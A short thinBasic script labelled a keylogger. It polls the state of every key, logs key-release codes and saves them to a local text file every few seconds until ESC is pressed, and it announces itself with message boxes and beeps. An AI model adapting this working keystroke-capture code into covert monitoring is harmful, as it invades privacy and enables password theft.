  uses "UI"       'use UI module
  uses "File"
 
  dim gBuffer as string
  dim vKeys(255) as byte
  dim ExitLoop as long value %FALSE
  dim OutFileName as string value app_sourcepath & "KeyPressed.txt"

  dim ElapsedTime as double
  dim SaveInterval as double value 3.0000
    
  msgbox 0, "Keylogger started." & $crlf & _
            "Press ESC key to stop it and have data saved in file:" & $crlf & _
            OutFileName
            
  ElapsedTime = timer
  while ExitLoop = %FALSE
    doevents                        '---Do not get all processing time :D
    ExitLoop = GetKeyPressed        '---Check key pressing
    sleep 1
    
    if timer - ElapsedTime > SaveInterval then
      file_save(OutFileName, gBuffer)
      ElapsedTime = timer
      '---Remove the beep
        beep
      '---
    end if

  wend

  file_save(OutFileName, gBuffer)
  msgbox 0, "Keylogger finished." & $crlf & "Data saved into " & OutFileName & " file."
  
  
  function GetKeyPressed() as long
    dim Counter as long
    dim UpdateTextBox as long
    
    for Counter = 1 to 255

      if getasynckeystate(Counter) then
        '---This is keydown
        if vKeys(Counter) = 1 then
          '---It was already pressed so do nothing
        else
          '---Set vKeys to 1 so we know it has been pressed
          vKeys(Counter) = 1
          'gBuffer += iif$(gBuffer = "", "", $CRLF) & str$(Counter) & "(Pressed)"
        end if
      else
        '---This is keyup
        if vKeys(Counter) = 0 then
          '---It was already not pressed so do nothing
        else
          '---Set vKeys to 0 so we know it has been released
          vKeys(Counter) = 0
          gBuffer += iif$(gBuffer = "", "", $CRLF) & str$(Counter) & "(Released)"

          '---If ESC key is released than report to exit from loop
          if Counter = 27 then function = %TRUE
        end if
      end if

    next
    

  end function
  